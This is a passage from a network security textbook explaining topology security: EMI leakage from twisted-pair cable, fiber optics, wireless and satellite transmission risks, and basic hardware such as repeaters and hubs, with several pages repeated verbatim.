something more secure, you must understand what vulnerabilities \nexist and how these can be exploited. \nThis same idea applies to network communications. In order to be able to design security into your network \ninfrastructure, you must understand how networked systems communicate with each other. Many exploits leverage \nbasic communication properties. If you are aware of these communication properties, you can take steps to insure \nthat they are not exploited. \nDigital Communications \nDigital communication is analogous to Morse code or the early telegraph system: certain patterns of pulses are \nused to represent different characters during transmission. If you examine Figure 4.1, you’ll see an example of a \ndigital transmission. When a voltage is placed on the transmission medium, this is considered a binary 1. The \nabsence of a signal is interpreted as a binary 0. \n \nFigure 4.1: A digital transmission plotted over time \nBecause this waveform is so predictable and the variation between acceptable values is so great, it is easy to \ndetermine the state of the transmission. This is important if the signal is electrical, because the introduction of \n" }, { "page_number": 63, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 63\nnoise to a circuit can skew voltage values slightly. As shown in Figure 4.2, even when there is noise in the circuit, \nyou can still see what part of the signal is a binary 1 and which is a 0. \n \nFigure 4.2: A digital transmission on a noisy circuit \nThis simple format, which allows digital communication to be so noise-resistant, can also be its biggest drawback. \nThe information for the ASCII character A can be transmitted with a single analog wave or vibration, but \ntransmitting the binary or digital equivalent requires eight separate waves or vibrations (to transmit 01000001). \nDespite this inherent drawback, digital communication is usually much more efficient than analog circuits, which \nrequire a larger amount of overhead in order to detect and correct noisy transmissions. \nNote \nOverhead is the amount of additional information that must be transmitted on a circuit to \ninsure that the receiving system gets the correct data and that the data is free of errors. \nTypically, when a circuit requires more overhead, less bandwidth is available to transmit \nthe actual data. This is like the packaging used for shipping. You didn’t want hundreds of \nlittle Styrofoam acorns, but they’re there in the box taking up space to insure your item is \ndelivered safely. \nWhen you have an electric circuit (such as an Ethernet network that uses twisted-pair wiring), you need to pulsate \nyour voltage in order to transmit information. This means your voltage state is constantly changing, which \nintroduces your first insecurity: electromagnetic interference. \nElectromagnetic Interference (EMI) \nEMI is produced by circuits that use an alternating signal, like analog or digital communications (referred to as an \nalternating current or an AC circuit). EMI is not produced by circuits that contain a consistent power level \n(referred to as a direct current or a DC circuit). \nFor example, if you could slice one of the wires coming from a car battery and watch the electrons moving down \nthe wire (kids: don’t try this at home), you would see a steady stream of power moving evenly and uniformly \ndown the cable. The power level would never change: it would stay at a constant 12 volts. A car battery is an \nexample of a DC circuit, because the power level remains stable. \nNow, let’s say you could slice the wire to a household lamp and try the same experiment (kids: definitely do not \ntry this at home!). You would now see that, depending on the point in time when you measured the voltage on the \nwire, the measurement would read anywhere between –120 volts and +120 volts. The voltage level of the circuit is \nconstantly changing. Plotted over time, the voltage level would resemble an analog signal. \nAs you watched the flow of electrons in the AC wire, you would notice something very interesting. As the voltage \nchanges and the current flows down the wire, the electrons tend to ride predominantly on the surface of the wire. \nThe center point of the wire would show almost no electron movement at all. If you increased the frequency of the \npower cycle, more and more of the electrons would travel on the surface of the wire, instead of at the core. This \neffect is somewhat similar to what happens to a water skier—the faster the boat travels, the closer to the top of the \nwater the skier rides. \nAs the frequency of the power cycle increases, energy begins to radiate at a 90° angle to the flow of current. In the \nsame way that water will ripple out when a rock breaks its surface, energy will move out from the center core of \nthe wire. This radiation is in a direct relationship with the signal on the wire; if the voltage level or the frequency \nis increased, the amount of energy radiated will also increase (see Figure 4.3). \n" }, { "page_number": 64, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 64\n \nFigure 4.3: A conductor carrying an AC signal radiating EMI \nThis energy has magnetic properties to it and is the basis of how electromagnets and transformers operate. The \ndownside to all of this is that the electromagnetic radiation can be measured in order to “sniff” the signal traveling \ndown the wire. Electricians have had tools for this purpose for many years. Most electricians carry a device that \nthey can simply connect around a wire in order to measure the signal traveling through the center conductor. \nThere are more sophisticated devices that can measure the EMI radiation coming off an electrical network cable \nand actually record the digital pulses traveling down the wire. Once a record of these pulses has been made, it is a \nsimple matter to convert them from a binary format to a format readable by humans (although a serious geek is \njust as happy reading the information in binary format, we did specifically say “humans”). \nNote \nWhile twisted-pair cabling has become very popular due to its low cost, it is also \nextremely insecure. Most modern networks are wired using unshielded twisted pair. Since \ntwisted pair is used for the transmission of electrical signals, EMI is produced. Because \nthe cable does not use any shielding, it is extremely easy to detect the EMI radiating from \neach of the conductors. So while twisted pair is an excellent choice for general network \nuse, it is not a very good selection if the information traveling along the wire needs to \nremain 100 percent secure. \nSo your first point of vulnerability is your actual network cables. These are typically overlooked when people \nevaluate the security of a network. While an organization may go to great lengths to secure its computer room, \nthere may be a web of cabling running through the ceilings. This can be even more of a problem if your \norganization is located in shared office space and you have cabling running through common areas. \nThis means that a would-be attacker would never have to go near a computer room or wiring closet to collect \nsensitive information. A stepladder and a popped ceiling tile are all that’s needed to create an access point to your \nnetwork. A savvy attacker may even use a radio transmitter to relay the captured information to another location. \nThis means the attacker can safely continue to collect information for an extended period of time. \nFiber Optic Cable \nFiber optic cable consists of a cylindrical glass thread center core 62.5 microns in diameter wrapped in cladding \nthat protects the central core and reflects the light back into the glass conductor. This is then encapsulated in a \njacket of tough KEVLAR fiber. \nThe whole thing is then sheathed in PVC or Plenum. The diameter of this outer sheath is 125 microns. The \ndiameter measurements are why this cabling is sometimes referred to as 62.5/125 cable. While the glass core is \nbreakable, the KEVLAR fiber jacket helps fiber optic cable stand up to a fair amount of abuse. Figure 4.4 shows a \nfiber optic cable. \n \nFigure 4.4: A stripped-back fiber optic cable \nUnlike twisted-pair cable, fiber uses a light source for data transmission. This light source is typically a light-\nemitting diode (LED) that produces a signal in the visible infrared range. On the other end of the cable is another \ndiode that receives the LED signals. The type of light transmission can take one of two forms: single mode or \nmultimode. \n" }, { "page_number": 65, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 65\nWarning \nNever look into the beam of an active fiber optic cable! The light intensity is strong \nenough to cause permanent blindness. If you must visually inspect a cable, first make \nsure that it is completely disconnected from the network. Just because a cable is dark \nfor a moment does not mean it is inactive. The risk of blindness or visual “dead \nspots” is too high to take risks—unless you know the cable is completely \ndisconnected. \nLight Dispersion \nYou’ll see light dispersion if you shine a flashlight against a nearby wall: the light pattern on the wall will have a \nlarger diameter than the flashlight lens. If you hold two flashlights together and shine them both against the wall, \nyou’ll get a fuzzy area in the middle where it’s difficult to determine which light source is responsible for which \nportion of the illumination. The farther away from the wall you move, the larger this fuzzy area gets. This is, in \neffect, what limits the distance on multimode fiber (that is, if you can call 1.2 miles a distance limitation for a \nsingle cable run). As the length of the cable increases, it becomes more difficult for the diode on the receiving end \nto distinguish between the different light frequencies. \n \nSingle-mode fiber consists of an LED that produces a single frequency of light. This single frequency is pulsed in \na digital format to transmit data from one end of the cable to another. The benefit of single-mode fiber over \nmultimode is that it is faster and will travel longer distances (in the tens-of-miles range). The drawbacks are that \nthe hardware is extremely expensive and installation can be tedious at best. Unless your company name ends with \nthe word “Telephone” or “Utility,” single-mode fiber would be overkill. \nMultimode transmissions consist of multiple light frequencies. Because the light range does not need to be quite so \nprecise as single-mode, the hardware costs for multimode are dramatically less than for single-mode. The \ndrawback of multimode fiber is light dispersion, the tendency of light rays to spread out as they travel. \nBecause multimode transmissions are light-based instead of electrical, fiber benefits from being completely \nimmune to all types of EMI monitoring. There is no radiation to monitor as a signal passes down the conductor. \nWhile it may be possible to cut away part of the sheath in order to get at the glass conductor, this might cause the \nsystem to fail thus foiling the attacker. However, newer fiber optic systems are more resilient, and ironically, more \nsusceptible to monitoring from this kind of attack. \nFiber cable has one other major benefit: it is capable of supporting large bandwidth connections. 10MB, 100MB, \nand even gigabit Ethernet are all capable of supporting fiber cable. So along with security improvements, there are \nperformance improvements. This is extremely helpful in justifying the use of fiber cable within your network—it \nallows you to satisfy both bandwidth and security concerns. If Woolly Attacker is going to attempt to tap into your \nnetwork in order to monitor transmissions, he will to want to pick a network segment with a lot of traffic so that he \ncan collect the largest amount of data. Coincidentally, these are also the segments where you would want to use \nfiber cable in order to support the large amount of data flowing though this point in the network. By using fiber \ncable on these segments, you can help to protect the integrity of your cabling infrastructure. \nBound and Unbound Transmissions \nThe atmosphere is what is referred to as an unbound medium—a circuit with no formal boundaries. It has no \nconstraints to force a signal to flow within a certain path. Twisted-pair cable and fiber optic cable are examples of \nbound media, as they restrain the signal to within the wire. An unbound transmission is free to travel anywhere. \nUnbound transmissions bring a host of security problems. Since a signal has no constraints that confine it within a \nspecific area, it becomes that much more susceptible to interception and monitoring. The atmosphere is capable of \ntransmitting a variety of signal types. The most commonly used are light and radio waves. \nLight Transmissions \nLight transmissions through the atmosphere use lasers to transmit and receive network signals. These devices \noperate similarly to a fiber cable circuit, except without the glass media. \nBecause laser transmissions use a focused beam of light, they require a clear line of sight and precise alignment \nbetween the devices. This helps to enhance system security, because it severely limits the physical area from \nwhich a signal can be monitored. The atmosphere limits the light transmission’s effective distance, however, as \nwell as the number of situations in which it can be used. \nUnbound light transmissions are also sensitive to environmental conditions—a heavy mist or snowfall can \ninterfere with their transmission properties. This means that it is very easy to interrupt a light-based circuit—thus \n" }, { "page_number": 66, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 66\ndenying users service. Still, light transmissions through the atmosphere make for a relatively secure transmission \nmedium when physical cabling cannot be used. \nRadio Waves \nRadio waves used for networking purposes are typically transmitted in the 1–20GHz range and are referred to as \nmicrowave signals. These signals can be fixed frequency or spread spectrum in nature. \nFixed Frequency Signals A fixed frequency signal is a single frequency used as a carrier wave for the \ninformation you wish to transmit. A radio station is a good example of a single frequency transmission. When you \ntune in to a station’s carrier wave frequency on your FM dial, you can hear the signal that is riding on it. \nA carrier wave is a signal that is used to carry other information. This information is superimposed onto the signal \n(in much the same way as noise) and the resultant wave is transmitted into the atmosphere. This signal is then \nreceived by a device called a demodulator (in effect, your car radio is a demodulator that can be set for different \nfrequencies), which removes the carrier signal and passes along the remaining information. A carrier wave is used \nto boost a signal’s power and to extend the receiving range of the signal. \nFixed frequency signals are very easy to monitor. Once an attacker knows the carrier frequency, he has all the \ninformation he needs to start receiving your transmitted signals. He also has all the information he needs to jam \nyour signal, thus blocking all transmissions. \nSpread Spectrum Signals A spread spectrum signal is identical to a fixed frequency signal, except multiple \nfrequencies are transmitted. The reason multiple frequencies are transmitted is the reduction of interference \nthrough noise. Spread spectrum technology arose during wartime, when an enemy would jam a fixed frequency \nsignal by transmitting on an identical frequency. Because spread spectrum uses multiple frequencies, it is much \nmore difficult to disrupt. \nNotice the operative words “more difficult.” It is still possible to jam or monitor spread spectrum signals. While \nthe signal varies through a range of frequencies, this range is typically a repeated pattern. Once an attacker \ndetermines the timing and pattern of the frequency changes, she is in a position to jam or monitor transmissions. \nNote \nBecause it is so easy to monitor or jam radio signals, most transmissions rely on \nencryption to scramble the signal so that it cannot be monitored by outside parties. We \ncover encryption in Chapter 9. \nTerrestrial vs. Space-Based Transmissions There are two methods that can be used to transmit both fixed \nfrequency and spread spectrum signals. These are referred to as terrestrial and space-based transmissions. \nTerrestrial Transmissions Terrestrial transmissions are completely land-based radio signals. The \nsending stations are typically transmission towers located on top of mountains or tall buildings. The \nrange of these systems is usually line of sight, although an unobstructed view is not required. \nDepending on the signal strength, 50 miles is about the maximum range achievable with a terrestrial \ntransmission system. Local TV and radio stations are good examples of industries that rely on \nterrestrial-based broadcasts. Their signals can only be received locally. \nSpace-Based Transmissions Space-based transmissions are signals that originate from a land-based \nsystem but are then bounced off one or more satellites that orbit the earth in the upper atmosphere. \nThe greatest benefit of space-based communications is range. Signals can be received from almost \nevery corner of the world. The space-based satellites can be tuned to increase or decrease the \neffective broadcast area. \nOf course, the larger the broadcast range of a signal, the more susceptible it is to being monitored. As the signal \nrange increases, so does the possibility that someone knowledgeable enough to monitor your signals will be within \nyour broadcast area. \nChoosing a Transmission Medium \nYou should consider a number of security issues when choosing a medium for transferring data across your \nnetwork. \n" }, { "page_number": 67, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 67\nHow Valuable Is My Data? \nAs you saw in earlier chapters, the typical attacker must feel like he or she has something to gain by assaulting \nyour network. Do you maintain databases that contain financial information? If so, someone might find the payoff \nhigh enough to make it worth the risk of staging a physical attack. \nWhich Network Segments Carry Sensitive Data? \nYour networks carry sensitive information on a daily basis. In order to protect this information, you need to \nunderstand the workflow of how it is used. For example, if you identify your organization’s accounting \ninformation as sensitive, you should know where the information is stored and who has access to it. A small \nworkgroup with its own local server will be far more secure than an accounting database that is accessed from a \nremote facility using an unbound transmission medium. \nTip \nBe very careful when analyzing the types of services that will be passing between \nyour facilities. For example, e-mail is typically given little consideration, yet it \nusually contains more information about your organization than any other business \nservice. Considering that most e-mail systems pass messages in the clear (if an \nattacker captures this traffic, it appears as plain text), e-mail should be one of your \nbest-guarded network services. \nWill an Intruder Be Noticed? \nIt’s easy to spot an intruder when an organization consists of three of four people. Scale this to three or four \nthousand, and the task becomes proportionately difficult. If you are the network administrator, you may have no \nsay in the physical security practices of your organization. You can, however, strive to make eavesdropping on \nyour network a bit more difficult. \nWhen you select a physical medium, keep in mind that you may need to make your network more resilient to \nattacks if other security precautions are lacking. \nAre Backbone Segments Accessible? \nIf a would-be attacker is going to monitor your network, he is going to look for central nodes where he can collect \nthe most information. Wiring closets and server rooms are prime targets because these areas tend to be junction \npoints for many communication sessions. When laying out your network, pay special attention to these areas and \nconsider using a more secure medium (such as fiber cable) when possible. \nConsider these issues carefully when choosing a method of data transmission. Use the risk analysis information \nyou collected in Chapter 2 to cost justify your choices. While increasing the level of topology security may appear \nto be an expensive proposition, the cost may be more than justified when compared to the cost of recovering from \nan intrusion. \n \nChapter 4: Topology Security \nIn this chapter, we will look at the communication properties of network transmissions. You will also see what \ninsecurities exist in everyday network communications—and how you can develop a network infrastructure that \nalleviates some of these problems. \nUnderstanding Network Transmissions \nIt is no accident that the National Security Agency, which is responsible for setting the encryption standards for \nthe U.S. government, is also responsible for monitoring and cracking encrypted transmissions that are of interest to \nthe government. In order to know how to make something more secure, you must understand what vulnerabilities \nexist and how these can be exploited. \nThis same idea applies to network communications. In order to be able to design security into your network \ninfrastructure, you must understand how networked systems communicate with each other. Many exploits leverage \nbasic communication properties. If you are aware of these communication properties, you can take steps to insure \nthat they are not exploited. \n" }, { "page_number": 68, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 68\nDigital Communications \nDigital communication is analogous to Morse code or the early telegraph system: certain patterns of pulses are \nused to represent different characters during transmission. If you examine Figure 4.1, you’ll see an example of a \ndigital transmission. When a voltage is placed on the transmission medium, this is considered a binary 1. The \nabsence of a signal is interpreted as a binary 0. \n \nFigure 4.1: A digital transmission plotted over time \nBecause this waveform is so predictable and the variation between acceptable values is so great, it is easy to \ndetermine the state of the transmission. This is important if the signal is electrical, because the introduction of \nnoise to a circuit can skew voltage values slightly. As shown in Figure 4.2, even when there is noise in the circuit, \nyou can still see what part of the signal is a binary 1 and which is a 0. \n \nFigure 4.2: A digital transmission on a noisy circuit \nThis simple format, which allows digital communication to be so noise-resistant, can also be its biggest drawback. \nThe information for the ASCII character A can be transmitted with a single analog wave or vibration, but \ntransmitting the binary or digital equivalent requires eight separate waves or vibrations (to transmit 01000001). \nDespite this inherent drawback, digital communication is usually much more efficient than analog circuits, which \nrequire a larger amount of overhead in order to detect and correct noisy transmissions. \nNote \nOverhead is the amount of additional information that must be transmitted on a circuit to \ninsure that the receiving system gets the correct data and that the data is free of errors. \nTypically, when a circuit requires more overhead, less bandwidth is available to transmit \nthe actual data. This is like the packaging used for shipping. You didn’t want hundreds of \nlittle Styrofoam acorns, but they’re there in the box taking up space to insure your item is \ndelivered safely. \nWhen you have an electric circuit (such as an Ethernet network that uses twisted-pair wiring), you need to pulsate \nyour voltage in order to transmit information. This means your voltage state is constantly changing, which \nintroduces your first insecurity: electromagnetic interference. \nElectromagnetic Interference (EMI) \nEMI is produced by circuits that use an alternating signal, like analog or digital communications (referred to as an \nalternating current or an AC circuit). EMI is not produced by circuits that contain a consistent power level \n(referred to as a direct current or a DC circuit). \nFor example, if you could slice one of the wires coming from a car battery and watch the electrons moving down \nthe wire (kids: don’t try this at home), you would see a steady stream of power moving evenly and uniformly \ndown the cable. The power level would never change: it would stay at a constant 12 volts. A car battery is an \nexample of a DC circuit, because the power level remains stable. \nNow, let’s say you could slice the wire to a household lamp and try the same experiment (kids: definitely do not \ntry this at home!). You would now see that, depending on the point in time when you measured the voltage on the \n" }, { "page_number": 69, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 69\nwire, the measurement would read anywhere between –120 volts and +120 volts. The voltage level of the circuit is \nconstantly changing. Plotted over time, the voltage level would resemble an analog signal. \nAs you watched the flow of electrons in the AC wire, you would notice something very interesting. As the voltage \nchanges and the current flows down the wire, the electrons tend to ride predominantly on the surface of the wire. \nThe center point of the wire would show almost no electron movement at all. If you increased the frequency of the \npower cycle, more and more of the electrons would travel on the surface of the wire, instead of at the core. This \neffect is somewhat similar to what happens to a water skier—the faster the boat travels, the closer to the top of the \nwater the skier rides. \nAs the frequency of the power cycle increases, energy begins to radiate at a 90° angle to the flow of current. In the \nsame way that water will ripple out when a rock breaks its surface, energy will move out from the center core of \nthe wire. This radiation is in a direct relationship with the signal on the wire; if the voltage level or the frequency \nis increased, the amount of energy radiated will also increase (see Figure 4.3). \n \nFigure 4.3: A conductor carrying an AC signal radiating EMI \nThis energy has magnetic properties to it and is the basis of how electromagnets and transformers operate. The \ndownside to all of this is that the electromagnetic radiation can be measured in order to “sniff” the signal traveling \ndown the wire. Electricians have had tools for this purpose for many years. Most electricians carry a device that \nthey can simply connect around a wire in order to measure the signal traveling through the center conductor. \nThere are more sophisticated devices that can measure the EMI radiation coming off an electrical network cable \nand actually record the digital pulses traveling down the wire. Once a record of these pulses has been made, it is a \nsimple matter to convert them from a binary format to a format readable by humans (although a serious geek is \njust as happy reading the information in binary format, we did specifically say “humans”). \nNote \nWhile twisted-pair cabling has become very popular due to its low cost, it is also \nextremely insecure. Most modern networks are wired using unshielded twisted pair. Since \ntwisted pair is used for the transmission of electrical signals, EMI is produced. Because \nthe cable does not use any shielding, it is extremely easy to detect the EMI radiating from \neach of the conductors. So while twisted pair is an excellent choice for general network \nuse, it is not a very good selection if the information traveling along the wire needs to \nremain 100 percent secure. \nSo your first point of vulnerability is your actual network cables. These are typically overlooked when people \nevaluate the security of a network. While an organization may go to great lengths to secure its computer room, \nthere may be a web of cabling running through the ceilings. This can be even more of a problem if your \norganization is located in shared office space and you have cabling running through common areas. \nThis means that a would-be attacker would never have to go near a computer room or wiring closet to collect \nsensitive information. A stepladder and a popped ceiling tile are all that’s needed to create an access point to your \nnetwork. A savvy attacker may even use a radio transmitter to relay the captured information to another location. \nThis means the attacker can safely continue to collect information for an extended period of time. \nFiber Optic Cable \nFiber optic cable consists of a cylindrical glass thread center core 62.5 microns in diameter wrapped in cladding \nthat protects the central core and reflects the light back into the glass conductor. This is then encapsulated in a \njacket of tough KEVLAR fiber. \nThe whole thing is then sheathed in PVC or Plenum. The diameter of this outer sheath is 125 microns. The \ndiameter measurements are why this cabling is sometimes referred to as 62.5/125 cable. While the glass core is \nbreakable, the KEVLAR fiber jacket helps fiber optic cable stand up to a fair amount of abuse. Figure 4.4 shows a \nfiber optic cable. \n" }, { "page_number": 70, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 70\n \nFigure 4.4: A stripped-back fiber optic cable \nUnlike twisted-pair cable, fiber uses a light source for data transmission. This light source is typically a light-\nemitting diode (LED) that produces a signal in the visible infrared range. On the other end of the cable is another \ndiode that receives the LED signals. The type of light transmission can take one of two forms: single mode or \nmultimode. \nWarning \nNever look into the beam of an active fiber optic cable! The light intensity is strong \nenough to cause permanent blindness. If you must visually inspect a cable, first make \nsure that it is completely disconnected from the network. Just because a cable is dark \nfor a moment does not mean it is inactive. The risk of blindness or visual “dead \nspots” is too high to take risks—unless you know the cable is completely \ndisconnected. \nLight Dispersion \nYou’ll see light dispersion if you shine a flashlight against a nearby wall: the light pattern on the wall will have a \nlarger diameter than the flashlight lens. If you hold two flashlights together and shine them both against the wall, \nyou’ll get a fuzzy area in the middle where it’s difficult to determine which light source is responsible for which \nportion of the illumination. The farther away from the wall you move, the larger this fuzzy area gets. This is, in \neffect, what limits the distance on multimode fiber (that is, if you can call 1.2 miles a distance limitation for a \nsingle cable run). As the length of the cable increases, it becomes more difficult for the diode on the receiving end \nto distinguish between the different light frequencies. \n \nSingle-mode fiber consists of an LED that produces a single frequency of light. This single frequency is pulsed in \na digital format to transmit data from one end of the cable to another. The benefit of single-mode fiber over \nmultimode is that it is faster and will travel longer distances (in the tens-of-miles range). The drawbacks are that \nthe hardware is extremely expensive and installation can be tedious at best. Unless your company name ends with \nthe word “Telephone” or “Utility,” single-mode fiber would be overkill. \nMultimode transmissions consist of multiple light frequencies. Because the light range does not need to be quite so \nprecise as single-mode, the hardware costs for multimode are dramatically less than for single-mode. The \ndrawback of multimode fiber is light dispersion, the tendency of light rays to spread out as they travel. \nBecause multimode transmissions are light-based instead of electrical, fiber benefits from being completely \nimmune to all types of EMI monitoring. There is no radiation to monitor as a signal passes down the conductor. \nWhile it may be possible to cut away part of the sheath in order to get at the glass conductor, this might cause the \nsystem to fail thus foiling the attacker. However, newer fiber optic systems are more resilient, and ironically, more \nsusceptible to monitoring from this kind of attack. \nFiber cable has one other major benefit: it is capable of supporting large bandwidth connections. 10MB, 100MB, \nand even gigabit Ethernet are all capable of supporting fiber cable. So along with security improvements, there are \nperformance improvements. This is extremely helpful in justifying the use of fiber cable within your network—it \nallows you to satisfy both bandwidth and security concerns. If Woolly Attacker is going to attempt to tap into your \nnetwork in order to monitor transmissions, he will to want to pick a network segment with a lot of traffic so that he \ncan collect the largest amount of data. Coincidentally, these are also the segments where you would want to use \nfiber cable in order to support the large amount of data flowing though this point in the network. By using fiber \ncable on these segments, you can help to protect the integrity of your cabling infrastructure. \nBound and Unbound Transmissions \nThe atmosphere is what is referred to as an unbound medium—a circuit with no formal boundaries. It has no \nconstraints to force a signal to flow within a certain path. Twisted-pair cable and fiber optic cable are examples of \nbound media, as they restrain the signal to within the wire. An unbound transmission is free to travel anywhere. \nUnbound transmissions bring a host of security problems. Since a signal has no constraints that confine it within a \nspecific area, it becomes that much more susceptible to interception and monitoring. The atmosphere is capable of \ntransmitting a variety of signal types. The most commonly used are light and radio waves. \n" }, { "page_number": 71, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 71\nLight Transmissions \nLight transmissions through the atmosphere use lasers to transmit and receive network signals. These devices \noperate similarly to a fiber cable circuit, except without the glass media. \nBecause laser transmissions use a focused beam of light, they require a clear line of sight and precise alignment \nbetween the devices. This helps to enhance system security, because it severely limits the physical area from \nwhich a signal can be monitored. The atmosphere limits the light transmission’s effective distance, however, as \nwell as the number of situations in which it can be used. \nUnbound light transmissions are also sensitive to environmental conditions—a heavy mist or snowfall can \ninterfere with their transmission properties. This means that it is very easy to interrupt a light-based circuit—thus \ndenying users service. Still, light transmissions through the atmosphere make for a relatively secure transmission \nmedium when physical cabling cannot be used. \nRadio Waves \nRadio waves used for networking purposes are typically transmitted in the 1–20GHz range and are referred to as \nmicrowave signals. These signals can be fixed frequency or spread spectrum in nature. \nFixed Frequency Signals A fixed frequency signal is a single frequency used as a carrier wave for the \ninformation you wish to transmit. A radio station is a good example of a single frequency transmission. When you \ntune in to a station’s carrier wave frequency on your FM dial, you can hear the signal that is riding on it. \nA carrier wave is a signal that is used to carry other information. This information is superimposed onto the signal \n(in much the same way as noise) and the resultant wave is transmitted into the atmosphere. This signal is then \nreceived by a device called a demodulator (in effect, your car radio is a demodulator that can be set for different \nfrequencies), which removes the carrier signal and passes along the remaining information. A carrier wave is used \nto boost a signal’s power and to extend the receiving range of the signal. \nFixed frequency signals are very easy to monitor. Once an attacker knows the carrier frequency, he has all the \ninformation he needs to start receiving your transmitted signals. He also has all the information he needs to jam \nyour signal, thus blocking all transmissions. \nSpread Spectrum Signals A spread spectrum signal is identical to a fixed frequency signal, except multiple \nfrequencies are transmitted. The reason multiple frequencies are transmitted is the reduction of interference \nthrough noise. Spread spectrum technology arose during wartime, when an enemy would jam a fixed frequency \nsignal by transmitting on an identical frequency. Because spread spectrum uses multiple frequencies, it is much \nmore difficult to disrupt. \nNotice the operative words “more difficult.” It is still possible to jam or monitor spread spectrum signals. While \nthe signal varies through a range of frequencies, this range is typically a repeated pattern. Once an attacker \ndetermines the timing and pattern of the frequency changes, she is in a position to jam or monitor transmissions. \nNote \nBecause it is so easy to monitor or jam radio signals, most transmissions rely on \nencryption to scramble the signal so that it cannot be monitored by outside parties. We \ncover encryption in Chapter 9. \nTerrestrial vs. Space-Based Transmissions There are two methods that can be used to transmit both fixed \nfrequency and spread spectrum signals. These are referred to as terrestrial and space-based transmissions. \nTerrestrial Transmissions Terrestrial transmissions are completely land-based radio signals. The \nsending stations are typically transmission towers located on top of mountains or tall buildings. The \nrange of these systems is usually line of sight, although an unobstructed view is not required. \nDepending on the signal strength, 50 miles is about the maximum range achievable with a terrestrial \ntransmission system. Local TV and radio stations are good examples of industries that rely on \nterrestrial-based broadcasts. Their signals can only be received locally. \nSpace-Based Transmissions Space-based transmissions are signals that originate from a land-based \nsystem but are then bounced off one or more satellites that orbit the earth in the upper atmosphere. \nThe greatest benefit of space-based communications is range. Signals can be received from almost \n" }, { "page_number": 72, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 72\nevery corner of the world. The space-based satellites can be tuned to increase or decrease the \neffective broadcast area. \nOf course, the larger the broadcast range of a signal, the more susceptible it is to being monitored. As the signal \nrange increases, so does the possibility that someone knowledgeable enough to monitor your signals will be within \nyour broadcast area. \nChoosing a Transmission Medium \nYou should consider a number of security issues when choosing a medium for transferring data across your \nnetwork. \nHow Valuable Is My Data? \nAs you saw in earlier chapters, the typical attacker must feel like he or she has something to gain by assaulting \nyour network. Do you maintain databases that contain financial information? If so, someone might find the payoff \nhigh enough to make it worth the risk of staging a physical attack. \nWhich Network Segments Carry Sensitive Data? \nYour networks carry sensitive information on a daily basis. In order to protect this information, you need to \nunderstand the workflow of how it is used. For example, if you identify your organization’s accounting \ninformation as sensitive, you should know where the information is stored and who has access to it. A small \nworkgroup with its own local server will be far more secure than an accounting database that is accessed from a \nremote facility using an unbound transmission medium. \nTip \nBe very careful when analyzing the types of services that will be passing between \nyour facilities. For example, e-mail is typically given little consideration, yet it \nusually contains more information about your organization than any other business \nservice. Considering that most e-mail systems pass messages in the clear (if an \nattacker captures this traffic, it appears as plain text), e-mail should be one of your \nbest-guarded network services. \nWill an Intruder Be Noticed? \nIt’s easy to spot an intruder when an organization consists of three of four people. Scale this to three or four \nthousand, and the task becomes proportionately difficult. If you are the network administrator, you may have no \nsay in the physical security practices of your organization. You can, however, strive to make eavesdropping on \nyour network a bit more difficult. \nWhen you select a physical medium, keep in mind that you may need to make your network more resilient to \nattacks if other security precautions are lacking. \nAre Backbone Segments Accessible? \nIf a would-be attacker is going to monitor your network, he is going to look for central nodes where he can collect \nthe most information. Wiring closets and server rooms are prime targets because these areas tend to be junction \npoints for many communication sessions. When laying out your network, pay special attention to these areas and \nconsider using a more secure medium (such as fiber cable) when possible. \nConsider these issues carefully when choosing a method of data transmission. Use the risk analysis information \nyou collected in Chapter 2 to cost justify your choices. While increasing the level of topology security may appear \nto be an expensive proposition, the cost may be more than justified when compared to the cost of recovering from \nan intrusion. \n \nBasic Networking Hardware \nThese days there is a plethora of networking products to consider when planning your network infrastructure. \nThere are devices for everything from connecting computer systems to the network to extending a topology’s \n" }, { "page_number": 73, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 73\nspecifications to controlling network traffic. Sometimes your choices are limited. For example, to connect an \noffice computer to the network, you must have a network card. \nMany of these devices, when used correctly, can also help to improve your network security. In this section, we \nwill take a look at some common networking hardware and discuss which can be used to reinforce your security \nposture. \nRepeaters \nRepeaters are simple two-port signal amplifiers. They are used in a bus topology to extend the maximum distance \nthat can be spanned on a cable run. The strength of the signal is boosted as it travels down the wire. A repeater will \nreceive a digital signal on one of its ports, amplify it, and transmit it out the other side. \nA repeater is like a typical home stereo amplifier. The amp takes the signal it receives from the CD or tape deck, \namplifies the signal, and sends it on its way to the speakers. If the signal is a brand-new Radiohead CD, it simply \nboosts the signal and sends it on its way. If you’re playing an old Grateful Dead concert tape that is inaudible \nbecause of the amount of background hiss, the amp happily boosts this signal, as well, and sends it on its way. \nRepeaters function similarly to a stereo amplifier: they simply boost whatever they receive and send it on its way. \nUnfortunately, the signal a repeater receives could be a good frame of data, a bad frame of data, or even \nbackground noise. A repeater does not discern data quality; it simply looks at each of the individual digital pulses \nand amplifies them. \nA repeater provides no data segmentation. All communications that take place on one side of a repeater are passed \nalong to the other side, whether the receiving system is on the other end of the wire or not. Again, think of a \nrepeater as a dumb amplifier and you will get the idea. \nHubs \nHubs are probably the most common piece of network hardware next to network interface cards. Physically, they \nare boxes of varying sizes that have multiple female RJ45 connectors. Each connector is designed to accept one \ntwisted-pair cable outfitted with a male RJ45 connector. This twisted-pair cable is then used to connect a single \nserver or workstation to the hub. \nHubs are essentially multiport repeaters that support twisted-pair cables in a star typology. Each node \ncommunicates with the hub, which in turn amplifies the signal and transmits it out each of the ports (including \nback out to the transmitting system). As with repeaters, hubs work at the electrical level. When you design your \nnetwork typology, think of hubs, which provide zero traffic control, as functionally identical to repeaters. \nWireless Hubs \nA new variation of the traditional hub is the wireless hub. Using radio transmissions instead of twisted-pair cable, \nthese hubs allow computers with wireless NICs to communicate with each other through the hub. Concerns about \nsecurity have led most of the wireless hub manufactures to include basic encryption in the wireless system. \nBridges \nA bridge looks a lot like a repeater; it is a small box with two network connectors that attach to two separate \nportions of the network. A bridge incorporates the functionality of a repeater (signal amplification), but it actually \nlooks at the frames of data, which is a great benefit. A common bridge is nearly identical to a repeater except for \nthe indicator lights, as shown in Figure 4.8. A forward light flashes whenever the 